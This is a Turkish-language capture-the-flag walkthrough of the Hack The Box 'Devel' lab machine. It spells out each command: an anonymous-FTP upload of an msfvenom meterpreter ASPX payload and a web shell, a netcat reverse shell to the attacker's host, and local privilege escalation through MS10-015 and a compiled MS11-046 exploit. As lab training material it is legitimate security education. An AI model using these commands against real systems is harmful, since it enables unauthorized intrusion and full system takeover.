Hack The Box: Devel Çözümü

0
1427
views
Hack the Box platformu sızma testi alıştırmaları için kullanılabilecek çevrimiçi platformlardan birisidir. Bu yazıda, Hack The Box platformundaki Devel isimli Kolay zorluktaki sanal makinenin ele geçirilmesi incelenecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Arctic sanal makinesinin IP ve işletim sistemi bilgileri aşağıdaki gibidir.

  • IP Adresi: 10.10.10.5
  • İşletim Sistemi: Windows

 

A) Port Tarama

Port taraması sonucunda 2 adet portun açık olduğu tespit edilmiştir.

nmap -sS -sC -sV -vv -p- -oA fulltcp –open 10.10.10.5

 

Açık portlar aşağıdaki gibidir:

  • 21/tcp
  • 80/tcp

 

B) FTP Servisinin İncelenmesi

TCP\21 portunda FTP servisinin anonim olarak çalıştığı görülmektedir.

ftp 10.10.10.5
get iisstart.htm

 

İndirilen iisstart.htm sayfasının standart olduğu görülmektedir.

 

Benzer olarak welcome.png dosyası da indirilebilir.

ftp 10.10.10.5
binary
get welcome.png

 

İndirilen welcome.png resminin de standart olduğu görülmektedir.

 

Hedef sisteme anonymous FTP üzerinden erişim sağladıktan sonra okuma yetkimizin olduğunu ve içerisinde bulunan dosyaları HTTP üzerinden çağırabildiğimizi gözlemliyoruz. Burada tespit ettiğimiz durum şu şekildedir;

Bulunduğumuz dizindeki dosyaları tarayıcı üzerinden çalıştırabiliyoruz. Yani eğer yazma yetkimiz de mevcut ise, FTP üzerinden sisteme bir shell dosyası yükleyerek reverse shell elde edebilmemiz mümkün gözüküyor.

 

C) Zafiyetin Metasploit Framework ile İstismarı

Anonim FTP kullanılması ve anonim erişimlerde yazma yetkisinin bulunmasını istismar etmek için msfvenom aracı ile oluşturulan bir Shellcode kullanılabilir.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=3333 -f aspx > shell.aspx

 

Oluşturulan shell dosyası hedef sisteme FTP servisi üzerinden yüklenir.

ftp 10.10.10.5
ls -l
put shell.aspx
exit

 

Shell.aspx çağırıldığında ters bağlantı isteği elde edilecektir. Bu isteği yakalamak için MSF “exploit/multi/handler” modülü kullanılabilir.

use exploit/multi/handler
set LHOST 10.10.14.20
set LPORT 3333
exploit

 

Kali üzerinde dinleyici başlatıldıktan sonra, Shell.aspx dosyası tarayıcı üzerinden çağırılır.

 

Böylece ters bağlantı isteği yakalanmıştır.

exploit

 

D) MS10-015 Zafiyetinin İstismarı ile Yetki Yükseltme

IIS kullanıcısı ile Meterpreter erişimi elde edildikten sonra, MSF “post/multi/recon/local_exploit_suggester” modülü ile sistem üzerindeki açıklıklar tespit edilir.

use post/multi/recon/local_exploit_suggester
show options
set SESSION 3
show options
exploit

 

Tespit edilen açıklıklardan biri olan “MS10-015” Microsoft Windows güncelleştirme eksikliğine ait zafiyet MSF “windows/local/ms10_015_kitrap0d” modülü kullanılarak istismar edilebilir.

use windows/local/ms10_015_kitrap0d
set SESSION 3
show options
exploit

 

Başarılı bir istismar sonucunda sistem üzerinde “NT AUTHORITY\SYSTEM” haklarında erişim elde edilmiş olur.

getuid
sysinfo
ifconfig

 

“user.txt.txt” dosyası “babis” kullanıcısının masaüstünden alınabilir.

type user.txt.txt
ipconfig

 

“root.txt.txt” dosyası “Administrator” kullanıcısının masaüstünden alınabilir.

type root.txt.txt
ipconfig

 

E) Zafiyetin Manuel Olarak İstismarı

“B” başlığında yapılandırma zafiyeti Metasploit Framework’teki MsfVenom aracı kullanılarak hazırlanan aspx dosyası kullanılmış ve Meterpreter erişimi elde edilmişti. Bu başlıkta ise Kali üzerinde hazır olarak bulunan bir aspx dosyası kullanılacak ve standart komut satırı erişimi elde edilecektir.

Bu amaçla ilk olarak hedef sistem üzerine “cmd.aspx” shell dosyasını ve “netcat” istemcisini yüklüyoruz.

put /usr/share/webshells/aspx/cmdasp.aspx cmd.aspx
binary
put /usr/share/windows-binaries/nc.exe nc.exe

 

Tarayıcı üzerinden yüklediğimiz “cmd.aspx” shell dosyasını çağırıyoruz. Bu dosya komut enjeksiyonu zafiyetini barındırdığı için işletim sisteminde web kullanıcısı yetkisi ile komut çalıştırabiliriz.

 

“nc.exe” istemci dosyasının yerini “C:\inetpub\wwwroot” olarak tespit ediyoruz. Bu dosya Kali makinemize ters bağlantı erişimini sağlamak için kullanılacaktır.

dir /s/b C:\ | findstr /i “nc.exe”

 

Kali üzerinde ters bağlantıyı yakalayacak bir dinleyici başlatılır.

nc -lvp 5555

 

Hedef sunucuya yüklediğimiz “nc.exe” aracını kullanarak, hedef sistem üzerinden Kali dinleyicisine doğru ters bağlantı erişimi elde etmiş oluruz.

C:\inetpub\wwwroot\nc.exe -e cmd 10.10.14.20 5555

 

Elde edilen ters bağlantının web uygulama kullanıcı yetkisi ile olduğu görülmektedir.

 

F) MS11-046 Zafiyetinin İstismarı ile Yetki Yükseltme

IIS kullanıcısı ile standart komut satırı erişimi elde edildikten sonra, işletim sisteminin 32 bit mimaride “Microsoft Windows 7 Enterprise 6.1.7600 N/A Build 7600” olduğu tespit edilir.

 

Söz konusu işletim sisteminin versiyonuna ait açıklıkların Google arama motoru üzerinden listelendiğinde Exploit-Db üzerinde bir istismar kodunun olduğu görülmektedir.

 

Zafiyete ait istismar kodu komut satırı üzerinden “searchsploit” aracı ile elde edilebilir.

searchsploit MS11-046
searchsploit -p exploits/windows_x86/local/40564.c
cp /usr/share/exploitdb/exploits/windows_x86/40564.c .

 

Not: Bulunduğumuz dizine kopyalama işlemi için “-m” parametresi de kullanılabilir.

searchsploit -m 40564

 

İstismar kodu Kali üzerinde derlenip ve FTP üzerinden hedef sisteme yüklenmir.

i686-w64-mingw32-gcc 40564.c -o pe.exe -lws2_32
ls -l
ftp 10.10.10.5
binary
put pe.exe

 

Elde edilen ters bağlantı (standart komut satırı veya Meterpreter komut satırı) üzerinden “pe.exe” dosyasının çalıştırıldığında NT AUTHORITY\SYSTEM yetkisinin elde edildiği görülmektedir.

dir C:\ /s/b | find /i “pe.exe”
C:\inetpub\wwwroot\pe.exe

 

“user.txt” ve “root.txt” dosyaları elde edilmiş olur.

 

Kaynaklar:

https://pentestworld.blogspot.com/2019/06/hack-box-devel.html

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.